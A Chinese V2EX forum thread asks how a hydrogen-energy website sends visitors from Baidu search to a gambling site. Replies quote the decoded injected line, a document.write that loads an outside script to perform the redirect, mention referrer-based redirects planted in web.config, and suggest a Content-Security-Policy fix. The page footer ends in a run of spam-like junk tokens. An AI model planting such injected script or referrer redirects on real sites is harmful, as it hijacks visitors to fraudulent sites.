这个网站是怎么被劫持的? - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
请不要在回答技术问题时复制粘贴 AI 生成的内容
supperxin
V2EX    程序员

这个网站是怎么被劫持的?

  •  
  •   supperxin 2018-12-31 17:56:24 +08:00 4140 次点击
    这是一个创建于 2480 天前的主题,其中的信息可能已经有所发展或是发生改变。

    百度搜素“氢能源”,出现的“中国氢能源网”,地址是:www.china-hydrogen.org

    但是点下去却跳转到某博彩网。

    看了下百度的搜索地址为

    https://www.baidu.com/link?url=p7cFgSeqnDkVcG7w7KtQSmEPsIjaYXZW7eF8CnBAc_bqPHdGxO6UFFSErEyhHuBC&wd= 

    如果把 querystring 的 wd 去掉,就可以正常停留在网站内了,看起来应该是网站内被挂了 js 检查 wd 这个参数。

    接下来要如何检查呢?

    10 条回复    2019-01-01 22:34:27 +08:00
    gam2046
        1
    gam2046  
       2018-12-31 18:04:57 +08:00   3
    http://www.china-hydrogen.org/ 查看 HTML,第 10 行内容,解码后内容为:

    window["document"]["write"]('<script type="text/Javascript" src="https://www.cpdas8.com/dd.js"></script>');

    而加入的该 js 很短,该 JS 内容的倒数第二行将网页进行了跳转。
    luminous
        2
    luminous  
       2018-12-31 18:20:42 +08:00 via Android
    我也见到过这种被黑的站 只有从搜索引擎点进去才跳转菠菜站 黑产真是啥操作都有
    abux1024
        3
    abux1024  
       2018-12-31 18:21:49 +08:00
    这种代码是运营商植入的吗
    mytsing520
        4
    mytsing520  
    PRO
       2018-12-31 21:56:16 +08:00
    @abux1024 是被黑了,不是植入。这种植入对运营商半点好处都没有,相反还会带来巨大风险
    zxq2233
        5
    zxq2233  
       2019-01-01 09:40:50 +08:00
    小伙子浏览器没装 Adblock 吧
    weipt
        6
    weipt  
       2019-01-01 12:03:34 +08:00
    我的网站刚刚有起色的时候被种码,你可以看看你的 webconfig 文件,里面加了如果是各种搜索引擎来的直接跳转到他的域名上。
    laoyuan
        7
    laoyuan  
       2019-01-01 18:08:37 +08:00
    因为站长、管理员是不会通过搜索引擎来访问自家网站的
    zy65334
        8
    zy65334  
       2019-01-01 21:41:18 +08:00
    @gam2046 看了下第 10 行,不知这种是怎么解码?在线给一个链接?
    zy65334
        9
    zy65334  
       2019-01-01 21:42:54 +08:00
    @gam2046 已经找到解码地方了
    gam2046
        10
    gam2046  
       2019-01-01 22:34:27 +08:00
    不知道这个网站是否就是你的。这个时候,一方面考验代码的严谨性,另一方面有个比较简单的方法可以,较为的简单的阻止这种代码执行,即使不幸被挂马,也不会影响用户。

    在服务端返回的时候(有前置反向代理,则可以在外层代理上设置),加上相对严格的 CSP 即可,比如可以运用这样的策略

    "script-src 'self' 'unsafe-inline'; object-src 'self'

    eval 函数会被直接禁用,而且浏览器只会加载同源的资源,其他的资源都会被阻止。
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     5118 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 27ms UTC 09:24 PVG 17:24 LAX 02:24 JFK 05:24
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86